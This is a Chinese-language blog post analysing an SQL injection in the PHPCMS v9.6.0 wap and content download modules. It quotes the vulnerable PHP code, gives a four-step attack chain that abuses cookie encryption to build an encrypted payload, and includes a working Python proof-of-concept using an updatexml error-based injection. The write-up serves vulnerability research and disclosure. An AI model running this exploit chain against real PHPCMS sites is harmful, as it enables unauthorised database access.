内容简介:漏洞发生在 /Applications/MxSrvs/www/phpcms_V9.6.0/install_package/phpcms/modules/content/down.php$_GET 方法传入 $a_k , 经过sys_auth 解密之后,进入 parse_str,解析到变量中最后带入到
漏洞发生在 /Applications/MxSrvs/www/phpcms_V9.6.0/install_package/phpcms/modules/content/down.php
public function init() {
$a_k = trim($_GET['a_k']);
if(!isset($a_k)) showmessage(L('illegal_parameters'));
$a_k = sys_auth($a_k, 'DECODE', pc_base::load_config('system','auth_key'));
if(empty($a_k)) showmessage(L('illegal_parameters'));
unset($i,$m,$f);
parse_str($a_k);
if(isset($i)) $i = $id = intval($i);
if(!isset($m)) showmessage(L('illegal_parameters'));
if(!isset($modelid)||!isset($catid)) showmessage(L('illegal_parameters'));
if(empty($f)) showmessage(L('url_invalid'));
$allow_visitor = 1;
$MODEL = getcache('model','commons');
$tablename = $this->db->table_name = $this->db->db_tablepre.$MODEL[$modelid]['tablename'];
$this->db->table_name = $tablename.'_data';
$rs = $this->db->get_one(array('id'=>$id));
$_GET 方法传入 $a_k , 经过sys_auth 解密之后,进入 parse_str,解析到变量中
最后带入到
\$rs = \$this->db->get_one(array(‘id’=>$id)); 进行查询
所以现在如果能找到一个经过sys_auth 并能回显给我payload的地方即可
/Applications/MxSrvs/www/phpcms_V9.6.0/install_package/phpcms/modules/attachment/attachments.php
public function swfupload_json() {
$arr['aid'] = intval($_GET['aid']);
$arr['src'] = safe_replace(trim($_GET['src']));
$arr['filename'] = urlencode(safe_replace($_GET['filename']));
$json_str = json_encode($arr);
$att_arr_exist = param::get_cookie('att_json');
$att_arr_exist_tmp = explode('||', $att_arr_exist);
if(is_array($att_arr_exist_tmp) && in_array($json_str, $att_arr_exist_tmp)) {
return true;
} else {
$json_str = $att_arr_exist ? $att_arr_exist.'||'.$json_str : $json_str;
param::set_cookie('att_json',$json_str);
return true;
}
}
先经过safe_replace 函数,过滤一遍,然后存入数组,如果不满足条件进入 set_cookie函数
public static function set_cookie($var, $value = '', $time = 0) {
$time = $time > 0 ? $time : ($value == '' ? SYS_TIME - 3600 : 0);
$s = $_SERVER['SERVER_PORT'] == '443' ? 1 : 0;
$var = pc_base::load_config('system','cookie_pre').$var;
$_COOKIE[$var] = $value;
if (is_array($value)) {
foreach($value as $k=>$v) {
setcookie($var.'['.$k.']', sys_auth($v, 'ENCODE'), $time, pc_base::load_config('system','cookie_path'), pc_base::load_config('system','cookie_domain'), $s);
}
} else {
setcookie($var, sys_auth($value, 'ENCODE'), $time, pc_base::load_config('system','cookie_path'), pc_base::load_config('system','cookie_domain'), $s);
}
}
可以看到,对传入的value 进行一次sys_auth 然后setcookie,可以在返回包中拿到回显
最后还需要存在一个cookie,让我们不被跳转到main界面
/Applications/MxSrvs/www/phpcms_V9.6.0/install_package/phpcms/modules/wap/index.php
function __construct() {
$this->db = pc_base::load_model('content_model');
$this->siteid = isset($_GET['siteid']) && (intval($_GET['siteid']) > 0) ? intval(trim($_GET['siteid'])) : (param::get_cookie('siteid') ? param::get_cookie('siteid') : 1);
param::set_cookie('siteid',$this->siteid);
通过GET方法得到$siteid,然后传到了set_cookie()函数中,满足条件。
攻击链:
- 访问 /index.php?m=wap&a=index&siteid=1 。获取响应头的set-Cookie字段。
- 将前一步获取到的字段赋值给userid_flash,作为POST参数。访问 /index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=【payload】
- 获取返回头的set—Cookie字段,此即为加密后的payload
- 访问 /index.php?m=content&c=down&a_k=【加密后的payload】,注入成功。
0x02 Poc
# -*- coding: utf-8 -*-
# @Time : 2018-12-20 23:24
# @Author : Patrilic
# @FileName: sql_poc.py
# @Software: PyCharm
import requests
import re
import sys
def poc(url):
try:
step1 = url + "/index.php?m=wap&c=index&a=init&siteid=1"
response = requests.get(step1)
post = {
"userid_flash":response.cookies["okuga_siteid"]
}
print("[+] Get Cookie : " + response.cookies["okuga_siteid"])
# 获取cookie,避免登陆失效
step2 = url + "//index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26"
response = requests.post(step2, post)
# print(response.cookies)
sqli_payload = response.cookies['okuga_att_json']
print("[+] Get Sqli_poc : " + sqli_payload)
# 获取加密 payload
step3 = url + '/index.php?m=content&c=down&a_k=' + sqli_payload
response = requests.get(step3)
# print(response.text)
user = re.findall(r'</b>XPATH syntax error:(.*?)<br />', response.text)
# 注入
try:
user[0]
print("[+] Congraduations! This url is Vulnerable! ")
except:
print("[-] Not vulnerable!")
except:
pass
def main():
url = sys.argv[1]
poc(url)
if __name__ == '__main__':
main()
以上所述就是小编给大家介绍的《phpcms_v9.6.0 wap模块 SQL注入》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
- [译] 依赖注入在多模块工程中的应用
- 模块化解耦框架RxFluxArchitecture4-依赖库与依赖注入
- PHPCMS v9.6.0 wap模块SQL注入 | FreeBuf × 破壳学院训练营
- Angular 4 依赖注入教程之二 组件中注入服务
- 服务端注入之Flask框架中服务端模板注入问题
- 服务器端电子表格注入 - 从公式注入到远程代码执行
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
